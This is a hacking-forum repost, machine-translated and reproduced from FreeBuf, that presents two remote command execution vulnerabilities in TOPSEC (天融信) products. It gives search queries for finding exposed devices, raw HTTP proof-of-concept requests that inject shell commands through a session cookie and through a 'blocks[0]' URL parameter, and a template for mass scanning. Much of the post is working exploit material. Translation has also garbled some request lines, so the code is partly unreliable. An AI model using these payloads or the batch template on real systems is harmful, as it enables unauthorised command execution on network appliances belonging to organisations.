跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

漏洞复现--天融信TOPSEC两处远程命令执行

精选回复

发布于

# 免责声明:

**文中涉及的漏洞已修复,敏感信息已编码。文章仅供经验分享。别当真。未经授权的攻击是违法的!文章中的敏感信息已经过多个级别的处理。因传播、使用本文提供的信息而造成的任何直接或间接的后果和损失均由用户自行承担。作者对此不承担任何责任。一切后果请自行承担。 **

## 1:漏洞描述

天融信是中国领先的网络安全解决方案提供商之一。专注于网络安全技术和产品的研发、生产和服务,为政府机构、企业和个人用户提供全面的网络安全解决方案。

## 2:受漏洞影响的版本

天融信天融信

## 三:网络空间地图查询

福发:

`title=\'Web 用户登录\' body=\'/cgi/maincgi.cgi?Url=VerifyCode\'` 1704360750_65967b2e75b845c45c747.png!small

##四:漏洞复现1 1704360770_65967b4275bea9d0489e0.png!small

POC1:

````

GET /cgi/maincgi.cgi?Url=aa HTTP/1.1

主机: X.X.X.X

Cookie: session_id_443=1|回显“漏洞!” /www/htdocs/site/image/vul.txt;

User-Agent: Mozilla/5.0(Windows NT 6.4;WOW64)AppleWebKit/537.36(KHTML,如Gecko)Chrome/41.0.2225.0 Safari/537.36

``1704360896_65967bc05debc432f4692.png!small

访问/site/image/vul.txt 1704360966_65967c0639d0805c79e6a.png!small

##五:批量检验

````

id: Trx-topsec-maincgi-cookie-rce

信息:

name: Trx-topsec-maincgi-cookie-rce

作者: 奶酪土拨鼠

严重性: 严重

description: 天融信(天融信)是中国领先的网络安全解决方案提供商之一。专注于网络安全技术和产品的研发、生产和服务,为政府机构、企业和个人用户提供全面的网络安全解决方案。

变量:

file_name: \'{{to_lower(rand_text_alpha(6))}}\'

file_content: \'{{to_lower(rand_text_alpha(15))}}\'

请求:

- 原始:

- |+

GET /cgi/maincgi.cgi?Url=aa HTTP/1.1

Host: {{主机名}}

Cookie: session_id_443=1|echo '{{file_content}}' /www/htdocs/site/image/{{file_name}}.txt;

User-Agent: Mozilla/5.0(Windows NT 6.4;WOW64)AppleWebKit/537.36(KHTML,如Gecko)Chrome/41.0.2225.0 Safari/537.36

- |

获取/site/image/{{file_name}}.txt HTTP/1.1

Host: {{主机名}}

User-Agent: Mozilla/5.0(Windows NT 6.4;WOW64)AppleWebKit/537.36(KHTML,如Gecko)Chrome/41.0.2225.0 Safari/537.36

匹配器:

- : DSL 型

DSL:

- \'status_code_1==200 status_code_2==200 contains(body_2, '{{file_content}}')\'

``1704361566_65967e5e7aa5fd9849e52.png!small

##:漏洞复现2

佛法:

`app=\'天融信-上网行为管理系统\'` 1704361267_65967d33765512a21fc56.png!small

1704361819_65967f5b8bce9cecd69f5.png!small

POC:

````

GET /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20%20echo%20'漏洞!'%20%20/var/www/html/vul.txt%0A HTTP/1.1

主机: X.X.X.X

User-Agent: Mozilla/5.0(Windows NT 6.3;WOW64)AppleWebKit/537.36(KHTML,如Gecko)Chrome/41.0.2225.0 Safari/537.36

``1704362026_6596802a0c175545cea4f.png!small

访问vul.txt 1704362156_659680ac7ddeb82a196db.png!small

转载自freebuf:[https://www.freebuf.com/articles/web/388740.html](https://www.freebuf.com/articles/web/388740.html) 作者:Cheese Marmot

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。